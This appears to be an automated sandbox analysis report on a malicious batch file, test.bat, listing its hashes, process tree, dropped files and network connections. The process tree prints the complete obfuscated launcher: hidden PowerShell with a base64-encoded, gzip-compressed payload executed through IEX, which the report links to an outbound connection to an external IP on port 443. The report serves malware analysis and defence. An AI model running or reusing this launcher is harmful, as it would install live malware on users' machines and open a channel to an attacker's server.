File name: | test.bat |
Full analysis: | https://app.any.run/tasks/f2c830cb-eb49-42bc-a212-e6ab57651438 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 20:54:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | 5C0BF7033362BB5C4B92B9B21C2F2253 |
SHA1: | 855B89149525A71A7B77D1C84502A4C4F36DE958 |
SHA256: | 88987CB359A26CA6676A7904FEF1E360FA37E5BC6C8BE7F131B504047CE7DFD7 |
SSDEEP: | 96:QTc3YIS9CQOCoFdwuuvAd/AWWzfCcLIIwP31czBa5mOnh2ixb4PxohtfC7YY:QThImCxXhavzfHMPak5m2xMPxohtf/Y |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2872 | cmd /c ""C:\Users\admin\AppData\Local\Temp\test.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3672 | powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASAA0AHMASQBBAE8AdwBVAGgAbABvAEMAQQA3AFYAVwBhADQAKwBiAHkAQgBMADkAbgBFAGoANQBEADIAaABsAHkAVgBoAHkAYgBNAEIAMgBaAGkAYgBTAFMAaABlAE0AOABXAE8ATQBIADIARABBAGoANwBXAGkATgBqAFMANAA3AFEAWQBjAGEAUAB6AEsANwBuACsALwBoAFIAKwBUAGkAWgBMAGMAegBhADUAMABrAFoARwBiAHIAdQByAHUAcQBsAE8AbgBxAHQAcgBQAEkAcABlAFIATwBPAEwAMgByAFEAYgAzADUAZAAzAGIATgB5AE8AVQBvAEoARABqAEMANgBIADUAeQBWAEcAYQBaAGEANABRAHkAcAA4ACsAMQBhAHkAawA5AE8AWQBOAFMAQQB1AGgAdABQAE4AWAA1ADQARQBrAHAATgBrAHoAOQB6AHYASABMACsAVABkAFQAbwAxAEQAUgBLAEwAbAB4ADQALwBOAEwARQBsAHcAeABLADcAZgBsAFQAWgBtAGMAcAByAGkAYwBFAFUASgBUAHYAawBTADkAeQBmAG4AcgBIAEcAQwAzAHcAOQBYAEcAKwB3AHkANwBnAHQAWAArAEYAUgBwADAAMwBpAEYANgBFADMAdAAxAEUAVAB1AEcAbgBQAHYANQBjAGoATABaAGYAMwBZAFIAYgBsAHAARgBYAE4ASABDAGUATwBMAGYALwB4AFIATABDADMAZQBpADgAdABLADYAMwBPAEcAYQBNAG8AWAB6AFYAUABLAGMARgBqAHgASwBDADIAVwB1AEwAOQBLACsAWQBHAFQAMAB3ADcAegBSAFoAMgA0AFMAWgB6AEcAUABxAHMANABKAEsAcABKAEYAUwB0AEsAawBZADgASABzAE4AcwBlADYANQBpAHQAWQB5ADgAdABsAHMAQQBiACsAQwBXAFkAWgBVAG4ARQBmAGUATgBYAHYAdABGAFYAagBTAC8AQwBjAEoAVABFAHIAdQB4ADUAQwBVADUAaABWAGEAVQBiADcAZQBNAHQANQBnAHQAUgBSAG0AbQBaACsAdwArAC8AdQBGAGwAaABaAEIARQBqAEkAUQBZADUAdwAwAG0AOABNADMARwB5AEoAeQA1AE8ASwB4ADAAVQBlAFIAUQBiADIARgAvAHkAQQAzAHkANABPAC8AKwByAGkALwBqAFgAaQAwAEIAcgB4AEoASgBTAE8AWQAvAE8AegA4ADMAVgBZAHkAKwBqACsATABwAEQAcwBmAFMAOQB3AGIAZgBJAGwAdQBCADUARgBWADIAQQA0ADYAOQAzAGIAOQArADkAOQBlADkAOABXAEEAMgBjADEAMwB5AEEAMABaAHYARgBaAFkAegBCAFYASAA0AFUAcAArAFMAaQA5AGoAcwBuAGwARABrAGQARABrAE0AcwBUAGsANwB3AFcAWgBnAGsARwBTADQAdAB1AFUAVQBlAGkAcwBWAHkAeQBSAFgAVwA3AHQAbABXAGYATwB1AHgALwBQAE0AOQB4AFAAcwBDAFUARAA4ADcAawBoAGkATwB1ADYAZABlAEEAbwBLAEYASABSAE4AdgBDAFEAdAB2ADQAUwBxAHMASgBXAFEAMQBjAHMASABQAGUAYQBkAGkAbgAwAFIAWQBQAFUAVQBvAEoATwA2AGQAVwB2AHkAUAAwAE0AYwArAHgAUgBkAHYASwAzAGUAMQBBAGQAagBHAEYAMgA4AEMANwBLAG0AWQA0AGcAQwB4AEgATQBjAHkAdAAvAGgAKwBXAFMAcwBrADcARwBXAHQAawBoAEgAcQA0AFUAUgAyAEkAWQBJAHAAVwBBAFgAQgBMAFgAMQByAHoARABVADAAZgBMAEUAYgA2AFQAZwBFAHUASwA3AGYAUgBRAGkARABEADQAVABHAGQAKwAwAGIAaQBVAC8AMwAwAC8ATgB2AFUAQwBvADIASwBVAHIAVABNAGoAZgBLAEkASwBQAGMATQBtAGQAaQBSAEwARgBYADUAdQBRAG8ASgBUAGUAUgBuAEwASAA0AE0AaQB4ACsATgBWAGYAUABLAEMATQB1AFMAdABsADkAdQAyAFgAcABCAGMAagBiAGcAYwAwADQAUwBsAG0AUwB1AFIAQgBDAGMASAA1AGkANwByAEIATABFAE0AMgB4AEsASABNAGQANABtAEgAbABaAEoATABnAGYAbgBEAHgAaAAwAGcAMABFAGEAVQBrAEMAbQBDAG4AUABVAFEAQwBaAG4ASQBFAFQASgBZAFQASQB3AEUAYgBYADAAaABRAHEAcABpAFkAZABjAE0AZAB4AFMASABvAFgAZgBKAGIAbwB5AGkAQQBiAEwANwBsAHcAbwBWAE4ASwBNAEIAZQA4AFQAcwB6ADcAeQBTAC8ATQBqAHAASAA1AEEANwBGAEsAeQBNAGgAegBDAGEATgBXAFoAbQB6AFMAYwBLAGcAVAB1AFQAbwBmAHEAWABVAHYANwBmAGsAVgBhADIANAAyAHQAUgBNADgAQwAwADIALwBEADEANQBGAHMAcQBKADUAWgB3AHYAbwBBAGQANwBuAG8ANgBGAFYAawA3AFUARwAxAFkAWABaAEIASQBHAHEARwBoAEoASABDAG8AbwB4AFIALwBxAEoAawBzAEEATQAvADYAMwA2AHAAQQAwAFoAWABoAG0AMwBZAGoAcQByAHIASQBsAG8AbgB3AGcAWQBsAGUASAAxAHkASwAxAGIAcQB3ACsAZQBNACsAOQBUAGEAZQBhAHEATQBlADEATAAzAGYAVAByAHQANABaAHEAZQBOAE8AcAA3ADcAdgBtAFgAYQBkAG0AYQAwAHUAZQB4ADUAMQBtAGQANgBhAGIAagBhAG0AMwBEAEcAcwBHAFoAdAAzADUAYwA2AEUAQwBOAHQAWgAvAGIAegByAGsAYgBQAFoAbAA3ADMAWgBzAGYAcgBoAHIASgB3AFAAZwBuAEkAOABiAHcATABQAG4ANgBtACsASAB6AHoANABwAGkARQAyAE4ATgBKADMAbQBtAE4ARgBrAEYAQgBmAGIAVwBWADkAUgB6AGsAbwBRAGoAMQB0AGsAVQBOAG4AVABLAHoAeAB0AHEAZQB4ADEAYwB5AG0AeQBQAEsAcgB3AFYAUgA4AFEAdQBUAFkAVAB6AGEAMgBHAEsAOQBDAFcANQBEAGIANgB4AHAAeQBHAGoAdQA3AHYAZABhADkAMAA2AHgAVABmAGIASwBPAGsAagBpAFkAVwBQAEEAaQBkAGUAZABnADUARgBkAEYARwA4AFkAQgB6AEUAbgBrAFEAUgA3AEwAOABnAGMAdABVAE0ARABkAFAAVwBvAE4ATwB2AHEAMABkADEANQBSAEsAcQBBADIAMQBYAFcATABuAHUAeQBOADQAcABqAFMAWABCADEAYgBYAG0ATgBDAGUAeQAxAFQAZgBIAG8AZQBoADMAWQBEAE8AYgBUAHIAYQB2AFAARwBaAEsAbwBMAGQAcgBSADcAdABwADMAQgBFAEUAVgB4AEEAMwBkAG0AOQBXAEgAYgBWAHIAMgB3ADEAVABDAG0AaABqAFMAeAB0AGsAZQB2AHAAcAB4AFEATgBKAC8ATwBOAG8AcAB1AHQAZABaADEAMAA1ADUATABqAGoAWABRAEQAYgBVAFgAWQAxAHMARABqACsAegA1AFMAdABMAEcAYwA5AEYAcQB6AE8AaAA4AFAAaABNAE8AQQBqAHAANwA5AGIARQBnAEcAcABaAHEAaQA3AE8ASgBOAGoAVgBFAFIAWgBwAFAAZABUAGEAWAB0AE4ARgBZAE4ARQBhADIASgBKADcARwBOAFcAMAA0AGsAWgA3ADIAWABuAHUAOQAwAFYAVgBnAG4AcwBWAE0AMwBWAGEAMgBaAHEAZwBSAEkAegBSAE8AdwB3AG0AbAAyAEQARgBxAGEASwByADAAcgBKAHEAeQBtAFQAZgBGADQAMwB5AGkASABGAHkAdABkAGMAYgBPAGIAbQB2AFIANwBSAEUANQBSAHcAbABOADUAQgBxAEsAZABxAHAANQB0AG8AZABqAHEAbQBXAEQAZwB6AEoARwBHAHUANQBGAGoANgB1AHEATwBJAHYAYQBsAGgAVABJAGUAdABaAHMANQBSAGoAYQA0AHMAQgBCAFEAMgBiADMATgAvAHUAcQBPAEoAOQAvAGIAdABLAG4ATwBGAEIAMQBXAGUANQBHAEEAUQBxAE0ATQBWAG8ALwBPAGEAaABqAHQANgBOADQAZABjAEgAWgB5AHYAVwBiAFEAcgB2AGQAQQBmADMAWgBWAFAAWQBNAEkAeQBZAEsANgBMAGYAWAByAFUAZAAxAEcAbABTAGYANwBKAEgAbgAxAHUASgBKAFQAcgBqADIAVABrAFoAeQBIAGgARQBsAGgAbABlAFcAdABVAEgAcwBQAEIAdQBUAGgAbAArADEAdAAzAEEAMgB3AGQANABVADUAQQBIAEkASgBuAFkAWQBRAEYANQBGAHAAUAByAGsAYQBJAGYATwBaAEUAUQBPAHIAbgBLAG8AdwAvADcAWQBuAGgAMwBFAGEAbwB5AHEAOABKAHkANwBoADYARgBaAFAAKwBxAGIAVwBhAFoAUABaAEsAbQAvADYAWgA2AEcAYwB2AE8AaAByAGcAaQBmAG0AeQBFAEoANgBVAHIAeQBnAEIAKwBQAFMAbgBSADQARABrAGIANwB3AEIAcwA3AEQAOABaAHgAYwBGAHAASgBzAFcAeABWAHEALwBaAHYAZQBhAEoAQgBwAGgAWABpADkAWQBlAFIATgBuAGgAOABsAFQANAAvADYANQBRADYAUwB0AEkAMQBvAHAAQgBXADAAUAByAHUARgBVADYATABFACsAMwBXAHgAMABZAHgAeQBWAGYAdwBmAEgANgAvADIAZQBJAGsAdwBoAFEAdQBCAEgAQgBsAHUATgBjAEgAbQBkAEwAWQB6AFgAdABxADMAdgBDAGcAbgBWACsAYgA3AEIASwBLAG4AQQBYAEQAbQB2AFQARABVAFkAbAA3AFUAUwB4ADkAYgBiAEgAMwBxAFkAOABmADUAMgBBAGoAbABKAHAANwBHAGEAagAwAGMAUgBTAHcAZABWAGsANAAxAGcAUQBCACsAcQBWAHcAcgBBAHYAZwA2AHEALwA3ADEAbwB4ADMASgAvADUAbAB1ADMATABlAGMAKwA4AFkAdgBUADYARwBYAG8ANABwADUAYQBXAG8AZwBQAFQAWQBlAEYARAAvAHIAdwBqAGUASwB1AEEAYQAvAHIAeQAvAFEAZgBEAHIAMwBQACsAUQAvAGgASwBxAFEAdgBuAEYAOAArADgAawAzADAANwA4AEkANABUAC8AcQBlADgATwBJAGcAdwBVAFQAYQBqAGYARgBGACsAdgBGAFQAKwBFADQATQBhAFgAVgAvAGUAdwBhADIAQwBBAEMALwA3AHQAeQBXAC8ARwB3ADQAeQA5AEgAOABBAEYANwBiAC8AeABhAEYAQQAzAGoAdwBzAEEAQQBBAD0APQAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2152 | "powershell.exe" -nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASAA0AHMASQBBAE8AdwBVAGgAbABvAEMAQQA3AFYAVwBhADQAKwBiAHkAQgBMADkAbgBFAGoANQBEADIAaABsAHkAVgBoAHkAYgBNAEIAMgBaAGkAYgBTAFMAaABlAE0AOABXAE8ATQBIADIARABBAGoANwBXAGkATgBqAFMANAA3AFEAWQBjAGEAUAB6AEsANwBuACsALwBoAFIAKwBUAGkAWgBMAGMAegBhADUAMABrAFoARwBiAHIAdQByAHUAcQBsAE8AbgBxAHQAcgBQAEkAcABlAFIATwBPAEwAMgByAFEAYgAzADUAZAAzAGIATgB5AE8AVQBvAEoARABqAEMANgBIADUAeQBWAEcAYQBaAGEANABRAHkAcAA4ACsAMQBhAHkAawA5AE8AWQBOAFMAQQB1AGgAdABQAE4AWAA1ADQARQBrAHAATgBrAHoAOQB6AHYASABMACsAVABkAFQAbwAxAEQAUgBLAEwAbAB4ADQALwBOAEwARQBsAHcAeABLADcAZgBsAFQAWgBtAGMAcAByAGkAYwBFAFUASgBUAHYAawBTADkAeQBmAG4AcgBIAEcAQwAzAHcAOQBYAEcAKwB3AHkANwBnAHQAWAArAEYAUgBwADAAMwBpAEYANgBFADMAdAAxAEUAVAB1AEcAbgBQAHYANQBjAGoATABaAGYAMwBZAFIAYgBsAHAARgBYAE4ASABDAGUATwBMAGYALwB4AFIATABDADMAZQBpADgAdABLADYAMwBPAEcAYQBNAG8AWAB6AFYAUABLAGMARgBqAHgASwBDADIAVwB1AEwAOQBLACsAWQBHAFQAMAB3ADcAegBSAFoAMgA0AFMAWgB6AEcAUABxAHMANABKAEsAcABKAEYAUwB0AEsAawBZADgASABzAE4AcwBlADYANQBpAHQAWQB5ADgAdABsAHMAQQBiACsAQwBXAFkAWgBVAG4ARQBmAGUATgBYAHYAdABGAFYAagBTAC8AQwBjAEoAVABFAHIAdQB4ADUAQwBVADUAaABWAGEAVQBiADcAZQBNAHQANQBnAHQAUgBSAG0AbQBaACsAdwArAC8AdQBGAGwAaABaAEIARQBqAEkAUQBZADUAdwAwAG0AOABNADMARwB5AEoAeQA1AE8ASwB4ADAAVQBlAFIAUQBiADIARgAvAHkAQQAzAHkANABPAC8AKwByAGkALwBqAFgAaQAwAEIAcgB4AEoASgBTAE8AWQAvAE8AegA4ADMAVgBZAHkAKwBqACsATABwAEQAcwBmAFMAOQB3AGIAZgBJAGwAdQBCADUARgBWADIAQQA0ADYAOQAzAGIAOQArADkAOQBlADkAOABXAEEAMgBjADEAMwB5AEEAMABaAHYARgBaAFkAegBCAFYASAA0AFUAcAArAFMAaQA5AGoAcwBuAGwARABrAGQARABrAE0AcwBUAGsANwB3AFcAWgBnAGsARwBTADQAdAB1AFUAVQBlAGkAcwBWAHkAeQBSAFgAVwA3AHQAbABXAGYATwB1AHgALwBQAE0AOQB4AFAAcwBDAFUARAA4ADcAawBoAGkATwB1ADYAZABlAEEAbwBLAEYASABSAE4AdgBDAFEAdAB2ADQAUwBxAHMASgBXAFEAMQBjAHMASABQAGUAYQBkAGkAbgAwAFIAWQBQAFUAVQBvAEoATwA2AGQAVwB2AHkAUAAwAE0AYwArAHgAUgBkAHYASwAzAGUAMQBBAGQAagBHAEYAMgA4AEMANwBLAG0AWQA0AGcAQwB4AEgATQBjAHkAdAAvAGgAKwBXAFMAcwBrADcARwBXAHQAawBoAEgAcQA0AFUAUgAyAEkAWQBJAHAAVwBBAFgAQgBMAFgAMQByAHoARABVADAAZgBMAEUAYgA2AFQAZwBFAHUASwA3AGYAUgBRAGkARABEADQAVABHAGQAKwAwAGIAaQBVAC8AMwAwAC8ATgB2AFUAQwBvADIASwBVAHIAVABNAGoAZgBLAEkASwBQAGMATQBtAGQAaQBSAEwARgBYADUAdQBRAG8ASgBUAGUAUgBuAEwASAA0AE0AaQB4ACsATgBWAGYAUABLAEMATQB1AFMAdABsADkAdQAyAFgAcABCAGMAagBiAGcAYwAwADQAUwBsAG0AUwB1AFIAQgBDAGMASAA1AGkANwByAEIATABFAE0AMgB4AEsASABNAGQANABtAEgAbABaAEoATABnAGYAbgBEAHgAaAAwAGcAMABFAGEAVQBrAEMAbQBDAG4AUABVAFEAQwBaAG4ASQBFAFQASgBZAFQASQB3AEUAYgBYADAAaABRAHEAcABpAFkAZABjAE0AZAB4AFMASABvAFgAZgBKAGIAbwB5AGkAQQBiAEwANwBsAHcAbwBWAE4ASwBNAEIAZQA4AFQAcwB6ADcAeQBTAC8ATQBqAHAASAA1AEEANwBGAEsAeQBNAGgAegBDAGEATgBXAFoAbQB6AFMAYwBLAGcAVAB1AFQAbwBmAHEAWABVAHYANwBmAGsAVgBhADIANAAyAHQAUgBNADgAQwAwADIALwBEADEANQBGAHMAcQBKADUAWgB3AHYAbwBBAGQANwBuAG8ANgBGAFYAawA3AFUARwAxAFkAWABaAEIASQBHAHEARwBoAEoASABDAG8AbwB4AFIALwBxAEoAawBzAEEATQAvADYAMwA2AHAAQQAwAFoAWABoAG0AMwBZAGoAcQByAHIASQBsAG8AbgB3AGcAWQBsAGUASAAxAHkASwAxAGIAcQB3ACsAZQBNACsAOQBUAGEAZQBhAHEATQBlADEATAAzAGYAVAByAHQANABaAHEAZQBOAE8AcAA3ADcAdgBtAFgAYQBkAG0AYQAwAHUAZQB4ADUAMQBtAGQANgBhAGIAagBhAG0AMwBEAEcAcwBHAFoAdAAzADUAYwA2AEUAQwBOAHQAWgAvAGIAegByAGsAYgBQAFoAbAA3ADMAWgBzAGYAcgBoAHIASgB3AFAAZwBuAEkAOABiAHcATABQAG4ANgBtACsASAB6AHoANABwAGkARQAyAE4ATgBKADMAbQBtAE4ARgBrAEYAQgBmAGIAVwBWADkAUgB6AGsAbwBRAGoAMQB0AGsAVQBOAG4AVABLAHoAeAB0AHEAZQB4ADEAYwB5AG0AeQBQAEsAcgB3AFYAUgA4AFEAdQBUAFkAVAB6AGEAMgBHAEsAOQBDAFcANQBEAGIANgB4AHAAeQBHAGoAdQA3AHYAZABhADkAMAA2AHgAVABmAGIASwBPAGsAagBpAFkAVwBQAEEAaQBkAGUAZABnADUARgBkAEYARwA4AFkAQgB6AEUAbgBrAFEAUgA3AEwAOABnAGMAdABVAE0ARABkAFAAVwBvAE4ATwB2AHEAMABkADEANQBSAEsAcQBBADIAMQBYAFcATABuAHUAeQBOADQAcABqAFMAWABCADEAYgBYAG0ATgBDAGUAeQAxAFQAZgBIAG8AZQBoADMAWQBEAE8AYgBUAHIAYQB2AFAARwBaAEsAbwBMAGQAcgBSADcAdABwADMAQgBFAEUAVgB4AEEAMwBkAG0AOQBXAEgAYgBWAHIAMgB3ADEAVABDAG0AaABqAFMAeAB0AGsAZQB2AHAAcAB4AFEATgBKAC8ATwBOAG8AcAB1AHQAZABaADEAMAA1ADUATABqAGoAWABRAEQAYgBVAFgAWQAxAHMARABqACsAegA1AFMAdABMAEcAYwA5AEYAcQB6AE8AaAA4AFAAaABNAE8AQQBqAHAANwA5AGIARQBnAEcAcABaAHEAaQA3AE8ASgBOAGoAVgBFAFIAWgBwAFAAZABUAGEAWAB0AE4ARgBZAE4ARQBhADIASgBKADcARwBOAFcAMAA0AGsAWgA3ADIAWABuAHUAOQAwAFYAVgBnAG4AcwBWAE0AMwBWAGEAMgBaAHEAZwBSAEkAegBSAE8AdwB3AG0AbAAyAEQARgBxAGEASwByADAAcgBKAHEAeQBtAFQAZgBGADQAMwB5AGkASABGAHkAdABkAGMAYgBPAGIAbQB2AFIANwBSAEUANQBSAHcAbABOADUAQgBxAEsAZABxAHAANQB0AG8AZABqAHEAbQBXAEQAZwB6AEoARwBHAHUANQBGAGoANgB1AHEATwBJAHYAYQBsAGgAVABJAGUAdABaAHMANQBSAGoAYQA0AHMAQgBCAFEAMgBiADMATgAvAHUAcQBPAEoAOQAvAGIAdABLAG4ATwBGAEIAMQBXAGUANQBHAEEAUQBxAE0ATQBWAG8ALwBPAGEAaABqAHQANgBOADQAZABjAEgAWgB5AHYAVwBiAFEAcgB2AGQAQQBmADMAWgBWAFAAWQBNAEkAeQBZAEsANgBMAGYAWAByAFUAZAAxAEcAbABTAGYANwBKAEgAbgAxAHUASgBKAFQAcgBqADIAVABrAFoAeQBIAGgARQBsAGgAbABlAFcAdABVAEgAcwBQAEIAdQBUAGgAbAArADEAdAAzAEEAMgB3AGQANABVADUAQQBIAEkASgBuAFkAWQBRAEYANQBGAHAAUAByAGsAYQBJAGYATwBaAEUAUQBPAHIAbgBLAG8AdwAvADcAWQBuAGgAMwBFAGEAbwB5AHEAOABKAHkANwBoADYARgBaAFAAKwBxAGIAVwBhAFoAUABaAEsAbQAvADYAWgA2AEcAYwB2AE8AaAByAGcAaQBmAG0AeQBFAEoANgBVAHIAeQBnAEIAKwBQAFMAbgBSADQARABrAGIANwB3AEIAcwA3AEQAOABaAHgAYwBGAHAASgBzAFcAeABWAHEALwBaAHYAZQBhAEoAQgBwAGgAWABpADkAWQBlAFIATgBuAGgAOABsAFQANAAvADYANQBRADYAUwB0AEkAMQBvAHAAQgBXADAAUAByAHUARgBVADYATABFACsAMwBXAHgAMABZAHgAeQBWAGYAdwBmAEgANgAvADIAZQBJAGsAdwBoAFEAdQBCAEgAQgBsAHUATgBjAEgAbQBkAEwAWQB6AFgAdABxADMAdgBDAGcAbgBWACsAYgA3AEIASwBLAG4AQQBYAEQAbQB2AFQARABVAFkAbAA3AFUAUwB4ADkAYgBiAEgAMwBxAFkAOABmADUAMgBBAGoAbABKAHAANwBHAGEAagAwAGMAUgBTAHcAZABWAGsANAAxAGcAUQBCACsAcQBWAHcAcgBBAHYAZwA2AHEALwA3ADEAbwB4ADMASgAvADUAbAB1ADMATABlAGMAKwA4AFkAdgBUADYARwBYAG8ANABwADUAYQBXAG8AZwBQAFQAWQBlAEYARAAvAHIAdwBqAGUASwB1AEEAYQAvAHIAeQAvAFEAZgBEAHIAMwBQACsAUQAvAGgASwBxAFEAdgBuAEYAOAArADgAawAzADAANwA4AEkANABUAC8AcQBlADgATwBJAGcAdwBVAFQAYQBqAGYARgBGACsAdgBGAFQAKwBFADQATQBhAFgAVgAvAGUAdwBhADIAQwBBAEMALwA3AHQAeQBXAC8ARwB3ADQAeQA5AEgAOABBAEYANwBiAC8AeABhAEYAQQAzAGoAdwBzAEEAQQBBAD0APQAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3232 | dw20.exe -x -s 1912 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Error Reporting Shim Exit code: 0 Version: 2.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2496 | "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KDAHNHBLSJR2Z2YX072S.temp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MHH5PLNAEWVKQPQUQZIS.temp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab9437.tmp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar9438.tmp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab9449.tmp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar944A.tmp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab9535.tmp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar9536.tmp | — | |
MD5:— | SHA256:— | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8TE2EQFZ0AE31TO6ZOKC.temp | — | |
MD5:— | SHA256:— | |||
2152 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2152 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 55.2 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2152 | powershell.exe | 209.126.106.228:443 | — | server4you Inc. | US | unknown |
2152 | powershell.exe | 93.184.221.240:80 | www.download.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.download.windowsupdate.com |
| whitelisted |